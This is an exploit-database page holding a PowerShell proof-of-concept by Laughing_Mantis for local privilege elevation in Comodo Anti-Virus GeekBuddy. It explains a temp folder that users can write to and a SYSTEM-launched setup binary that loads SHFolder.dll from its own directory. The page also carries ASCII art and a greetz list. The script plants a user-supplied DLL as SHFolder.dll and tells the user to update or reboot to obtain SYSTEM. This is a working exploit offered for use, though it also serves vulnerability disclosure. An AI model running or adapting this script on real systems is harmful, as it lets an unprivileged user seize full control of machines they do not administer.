Comodo Anti-Virus SHFolder.DLL - Local Privilege Elevation Exploit



EKU-ID: 5424 CVE: OSVDB-ID:
Author: Laughing_Mantis Published: 2016-03-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<#
 
 
                                                   ````......````                                                            
                                              ``,;''''''''''''''''';,`                                                       
                                           .;''''''''''''''''''''''''''',`                                                   
                                       `:''''''''+';:,.``````.,:;'''''''''':`                                                
                                     ,;'''''';,.`                  ``,;'''''';:                                              
                                  `:'''''',.                            `,'''''';.                                           
                                `;+''+':`                  ,;              `,''''';.                                         
                              `;'''';.             ``    .:;'` `.             `;'''''.                                       
                          `  :+''';`          `,``:+''   ';;'`,'';  ``   ``      :'''';`                                     
                           .'''';`           ,';' '':'`  ';,'`'',' :''' .''`       :'''',                                    
                         `;''''`         ;'' :+.` ;';,   ';:' ''''`,;:+ '',         `;''''`                                  
                        .''''.     ;:`, .'.':`'''.:;`;.  +;:' '::; ;''' ';            .'''',                                 
                       :''';`   `  '''',`':'' ..;:`','`  '''' ':;;`'`';`':`   :;        :''';                                
                      ;''+,     .;`.'.'' ';.'`';': ,:. `  ` ` `,: .';',,'`;'.`';':       .+'''`                              
                    `''''`      ;'; ''.'.,','` ,`                  ``;`''  .`;'`''+:       ;'''`                             
                   `''''    .,  .'' ,'.'' ;;.         ````````         `.  ``'::'`;; `      :'''.                            
                 ``''':    `+,`  .':`'','        `,;''''''''''+'':.`        ;'.+:;'``':      .'''.                           
                 `''',      '',   ''`:;      `:'''''''''''''''''''''';.      `;'`': ''`'`     .''',                          
                `''',   `   `''`  `';     .''''''''''''''''''''''''''''';`    `.;' ;'.''`.:    `''',                         
               `''',     :''.`''   `    ,;'''''''''''''''''''''''''''''''';. `  `,.'::', ''`    .'''.                        
               ''',      '.''`,':     ,'''''''''''''''''''''''''''''''''''''', `  .+,'; '';      .'''`                       
              ''':       ''`'' ;.   `'''''''''''''''''';:::;';'''''''''''''''''.    ;' :': ,,`    .'''                       
             :'';        `''.'`  ` :''''''''''''';:::.',   `''';`:;'+'''','''''+;    `,'; :'''     ,'''                      
            .'''     ``   .++;   `''''''''''''`.     `':    ''';    `:''' :'''''''.   .+ :''.+.     :'':                     
           `''+     :'':   ``   ,'''''''''''''       `':    ''';       `: ,'''''''':   .`''.''   `   '''`                    
           ;''.    `+.',;      ;'''':''''''''; `      ',  .'''':       `  :''''';''';   `'.',`,',    `+''                    
          ,'':      '';,'.    ;''''':''''''''`+`      ;..`;'+''.        '.:''''';'''''```.+'  +:'`    .'';                   
         `'''    `;``+',;.`  ;''''':''''''''.';      `;'',    '`        '' ;''''','''''`    ;,+.+.     ;''.                  
         ;'+.    :'': ;':   ;'''''':''''':',''.      `'';.+'  '`        ,'; .'''';''''''`  `+.':`      `'''                  
        `'':    .+`;''` `  ;'''''':''''''.::''.      .''.     ::        `'';`,'''':''''''`  :+'.        ,'',                 
        '''`    :''.:''   :''''''':'''''; :''''      .'',   `.,;     :+'`''': ;''','''''''   ,`          '''                 
       .'':      `'';``  ,''''''':;''''':`''';',     ,''+` ,+':'     +'''''''`,''''''''''';         .+`  .'':                
       '''    `''. :',  `''''''':`'''''+.;';.:::::::,,''';`'': .     .'''''''; ''''.''''''',    `  ;'':   '''                
      .'',    ','';`.   '''''''; :'''''' `,;'''''''''.```   .   ''''';:,`:;''+`'''',,'''''''`    :'';`    `+':               
      '''`    ''.,';   ;'''''';  ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :'''''''   '''.       ;''               
     `'':     .'';:;  `'''''''` .+'', ,'''''''''''';  '''''''++`''''':..:'''' `'''''  ;'''''',  .,    ``   .'',              
   ` :''        :''`  ''''''+`  ;''``;'''''''''''''':``,,.`````,'''''.       ';.;'''` `'''''''`      .++.   '';              
     +''             ,'''''':   ;+`,'''''''''''''''''+''';;;;'''''''+`       :;+,`''. `.'''''';    .+'''`   :'+`             
    ,''.    ':       +''''';    ,,;''''''''''''''''''''''''''''''''''.  `.::,` `';.',   ;''''''`  :'':  `.  `'';             
    ;''    :;.;':   ,''''''.    `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;,   `''''''; `.;  .;'+`  ;''             
    '': `  ;';';'   '''''';     ''';;''''''',`.'',`   .:;;''''''''''.,'''''''''''.;;.    ,''''''   `;''''.   .''`            
   .''.    .';`;'  .''''''.    :+;;''''''''''': ;'    ::::...;''+'':,'''';..``;''';.      ''''''; `:''.`':   `'':            
   :''     `  ,'`  ;''''''.    :;'''''''''''''';`;,               `,''';` .:;;;'''':      ,''''''   .,''',    '''            
   ;';    ''';,`  `''''''''''` :''''''''''';.:'''`';:`            ,''';`;''''''''''',      ''''''.  ;';,`     :''`           
  `'',   .;,''';  ,'''''''''' ;'''''''''':`   :'''`::`          ``'''',+''''''''''''+`     ;''''';  .``.:;`   `''.           
  .''`   `+;'`;`  '''''''''';.'''''''',`       ''';`             :''';'''';::;'''''';;   ` `''''''`  ;'';;;   `+':           
  :''     ..;''  `''''''''''`'''''''',         .'''`            `+''';''.     ,'''''''''''''''''''''''''''''''''''''':`      
  ;''    :.  ``  .'''''''''';''''''''           ;'';            ;''':::`       :'''''''''''''''''''''''''''''''''''''''',    
  ;':    '''':`  :'''''''''''''''''',`          .'''            ''''.          `+'''''''''''''''''''''''''''''''''''''''''   
  '',    :,;'':  ;''''''''''''''''''`            ;''...        :''''`           :''''''''''''''''''''''''''''''''''''''''''` 
 `''.   `+'':,`  '''''''''''''''''';             ,'';.+`     . ,;'''            `''''''''''''''''''''''''''''''''''''''''''; 
 .''.   `.,;';   '''''''''';''''''',              ''',+. `` .'  .'''             ''''''''+'''''''''''''''''''''''''''''''''',
 .'+`   ;'''''          ``  '''''''`             `;''''.'++','`+.'''             '''''';                            `;+''''''
 ,''                        ''''';;               ,'''';'''';'``.'''             :''''''`                             .'''''':
 :'+                        '''''':               .'''';'''';'` .'''             ,''''''`                              ,''''';
 :''            ,''''',     ''''''`               .'''';'''';', .'''`            .''''''`                               ''''''
 ;''  `'''''';  :''''',     ''''''                .'''';'''';':,''''.            .''''''`                               ''''''
 ;''  `';'''''  :''''',     :'''';                :''''''''';''.'''''            `''''''`                               ;'''''
 ;''            :''''',     ,'''''               `+''''''''':''.'''''`           ,''''';                                ''''''
 :'+            ,''''',     `'''''.              ,'''''''''':''::'''';           ;''''':                               `''''''
 :''      ```.  ,''''':      ''''':             `''''''''''',''+`'''''.         `''''''.                               :''''''
 ,''` `'''''''  .''''';     `''''':             '''''''''''';''',,''''',        '''''''                               ,'''''',
 .''` `''':,.;  `''''''     `'''''':           '''''''''''''';'''`'''''':.   `,''''''',                             .''''''''
 `''`  `,;;;''`  ''''''     `'','''';,`     `,''''''''''''''',''':.''''''''''''''''''':`     ;'''''''''''''''''''''''''''''',
  '',   `+';;,   ''''''     `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+      ''''''''''''''''''''''''''''''; 
  '':   `   `,.  ;'''''.    `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;;     `''''''''''''''''''''''''''';';  
  ;';    ,'''';  :''''':    `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,',     ,'''''''''''''''''''''''''''';   
  ;''    ';;,..  .''''''    `''';;  :''''''''''''''''';'''''''. '''''`;'''''''''''';+'`     ;'''''''''''''''''''''''''';.    
  :''   `,:;'''   ''''''`   `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+:      '''''''';''''''''';''''';,`      
  .''.   .''',`   ;''''': `  ''':;''.  ````` :+'''''',;''''''',  '''''';..;''''''''''`     `''''''    `,'':   `+':           
   '':    `  .;.  ,'''''+    .'';,'''''''';:''''''''','''''''':  ;'''''''''.`,'''''''      ;''''';  ,'',      .''.           
   '';     :+.++` `''''''.   +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''',      ''''''.  ':''',    :''`           
   :''    ,';:.'.  ;''''''   ''''.:''''''''''''''''';;'''''''''''.'''.  `:;'''''':'':     :''''''   ';,.:'    '''            
   .''.   .;:'''   .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''',   '''''':   ,'''',   `'':            
    '';    ;';, ;`  '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';'   ,. .;:    ,''`            
    ;''       `;', `,'''''''''''''.,'''''''''''''';','''';:.``   `,.;'''''''''''.+''''''.'''''';  ,'+'.      '''             
    .''.    '''';`   ''''';''''''';`'''''''''''''':.'';:,;'''':`  ,:`:''''''''','',`:''':''''''`  '.:'''    `'':             
     '''   :'': `:.  ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.'''''';  `'''..'    :''              
     :''`  `,. ;:++`  ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+''''''  ;. ,+''`    '';              
     `'':    `'',`;:  `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,'    ,'',              
      ;''`   `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;''''''''  +.''+;      '''               
      `'':    ;'';` `   ''''''':''''';`'''''''',  '''''''''''''''.,''''`''''',:''''`,'''''''`  '''.:';    .'':               
       ''+`    ,`  ,+:  `'''''','''''':`'''''''` :''''''''''''';   ;'''`+''''`;'''':+''''''.` ` :'':;,    '''                
       .'':     ;';''.   .'''''';'''''',`'''''+  ''''''''''''''`  .,'';.''''' '''''''''''':   +'``;';    .'',                
        ''+`    :''; ,'`  :''''','''''''.,''''' ,''''''''''''''  :''''';''''','''';'''''';   ,.''. .``   '''                 
        `';;    `+. ;'':'  :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.''''''   :';`'';     :''.                 
         :'',`    `'':.''`  ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;''''''   ` :''.'''`  `'''                  
          '''     ;'.:''`    ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''`  .''``'+',:   '''`                  
          .';;    `;;';   `   :''''':'''''';'''`'';''''''''''': ,''''''''''`''';''''';    .,''` :`    ,'':                   
           ;'',    `',   `'.   ,''''';''''';'''''':''''''''''': .''''''''',`+';,'''';    ``.''';    ``'''                    
            '''`        `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'',   ,'`:'''''`    '''`                    
            .'''        ;'.''    `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',`   `;''''''';.   ;'',                     
             ,'';      ''.;',      ,';''''';,''''''`+,`   .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';                      
              ;'';    ''';',   '.   `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''                       
               ''':   .,,':   :':    +''''''',''';.:'+,.`     `.:''':`''''''''''; `'':'''''''''''''',`                       
                ''':     `   .''  `'`;'''''''..,.:+,`   ``.,.`    ,'''`;'''''''+.';'.:'''':;'''''+:.'`                       
                 ''':     ;:`+'`  ,:..,''''''; .+:   `:'+''''';`    ;'; .''''': `:';:+''';`''''''. .':                       
                 `''';    ; ;'.    .';'`;'''',;'.   .+''''''''''`    ;;'+:'''; .+'''''''';''''''.;,'';                       
                  `''''    ,';     :'`'`;'''':+`   `'''''''''''':     ;'';'''`;''''''''''''''''',.''';                       
                   `''''  ` `      `':. ';''.+.    `'''''''''''';     `'''''::'''.'''',`'''''': :';;''                       
                     ''''.        :;,'`:'.';',      '''''''''''':      ,'''','''..''': '''';;:,''. `''                       
                      :''':      `.+'' '''','       :''''''''''+.       ''''''':`'''' .''';:;`.'.:' ';                       
                       ,''''`      `,` ',;:'. `;;;,``'''::::;''; :';,   ,'''''' ;'''` +'''.''+'.:'+`':                       
                        `'''':      `  ;'':'  '''''+;.;  ``  ,:`''''',  `'''''`,'''' :'''.''''..''','.                       
                          :''''.        .,': :'''''''.`;'''';` .''''''`  '''':`+'''``''',;'''``''';:'.                       
                           `'''''`      `.'` ''''''';`'''''''': ,''''';  ;'''`''''; ''';:'''. ;''',''                        
                             ,'''''`    `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:                        
                               :''''',   .'  '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.                        
                                `:+'''';..;  '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+                         
                                  `,''''':'  ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:                         
                                     .;+':'  '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +                          
                                        .:+` '''''''`''''''+'''+.''''';  .' ;''' ;''.;,'' ' ''.:``:                          
                                          '. :'''''':.+'''''''',;''''',  ;: ;''; '''.'.,;,,:'' '`'                           
                                          ;; `'''''''``;'''''',`,'''''  `'` ''',.''',.:;`' ''.,.`;                           
                                          .+  ''''''' ` `.,,.`'; ''';   :; `''+`;'';;: :.;`',`; ;`                           
                                           +: `'''''``';;;;;'''', ``   `+. `''' '''::;;:;`;'`;..,                            
                                           ,'  ``.. `+''''''''''+`     :'  `'';`''':. ,.',''.; '                             
                                           `+'      :'''''''''''',    `+.`  '',.''',. :,''''+ ;                              
                                            .',     ;''''''''''''.    ':    ''.,''':` ;.''''.,.                              
                                             :'.    :''''''''''',    ;'`    ''.:''',':;.''':.:                               
                                              ''.     ,:''''',`     ;+`     :'.:'''' ':`''; ;                                
                                              `'',                 ''.       ::,''''``; :, '                                 
                                                ;+;`             .'+`         ``'':'`,;   '``                                
                                                 ,'';.        `.'';`            :';'.,;  '.                                  
                                                  `,''';:::::;'''.                ``+;' +`                                   
                                                     `,:''''';,`                     ,,;                                     
 
 
 
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
 
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
 
###Technical Geeky Stuff###
 
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
 
The directory listing is as follows:
10/06/2015  12:08 AM    <DIR>          .
10/06/2015  12:08 AM    <DIR>          ..
10/02/2015  10:43 PM                27 download.cfg
10/02/2015  10:47 PM           637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015  10:44 PM         2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015  10:44 PM           547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015  12:07 AM         1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015  10:44 PM           554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015  12:06 AM           950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015  12:08 AM           563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015  10:43 PM           768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015  12:08 AM           581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015  10:47 PM           459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015  10:46 PM         1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015  12:07 AM         1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015  12:07 AM           648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015  10:43 PM                 1 survey_version.txt
10/06/2015  12:05 AM    <DIR>          updates
 
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
 
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                BUILTIN\Administrators:(OI)(CI)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                BUILTIN\Users:(OI)(CI)(ID)R
                                BUILTIN\Users:(CI)(ID)(special access:)
                                                      FILE_WRITE_DATA
                                                      FILE_APPEND_DATA
                                                      FILE_WRITE_EA
                                                      FILE_WRITE_ATTRIBUTES
 
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access.  This allows
non-administrator users the ability to create files in the directory but not delete or modify
existing files.
 
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder.  This service is auto launched by the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
 
This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM
level privielges.  This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
 
During client connections to update servers and Geek Buddy executions the unit.exe binary will
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe.  This setup binary has
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is
executed from.
 
.data:00409240                 dd offset aShfolder     ; "SHFOLDER"
.data:00409244                 dd offset aShgetfolderpat ; "SHGetFolderPathA"
 
During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before
looking in the other PATHS variables.
 
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
update or client connection to secure servers (which occurs automatically at user login) a user can
elevate their privileges to SYSTEM and compromise the system fully.
 
 
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
 
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times.  C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do.  #Ninja
Sizzop - for fixing my greetz
 
#########################################################################################################
 
 
#>
 
Param
(
 
    [Parameter(ValueFromPipelineByPropertyName = $true)]
    [string]$DLL = ""
)
 
 
 
 
if (!(Test-Path $DLL))
{
    throw "Fatal Error: The specified file: $DLL does not exist." 
}
 
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
 
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
 
 
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
 
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
 
 
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
  
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)